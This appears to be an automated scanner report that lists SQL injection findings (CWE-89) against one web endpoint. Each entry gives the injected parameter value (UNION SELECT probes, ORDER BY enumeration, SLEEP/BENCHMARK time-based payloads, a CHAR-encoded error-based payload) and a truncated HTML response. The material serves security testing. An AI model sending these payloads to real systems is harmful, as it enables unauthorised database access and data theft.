href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1525\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1526Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1527\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1528\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1529\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1530\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1531\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1532\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1533\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1534Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1535\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1536\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1-true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1537\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1538\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 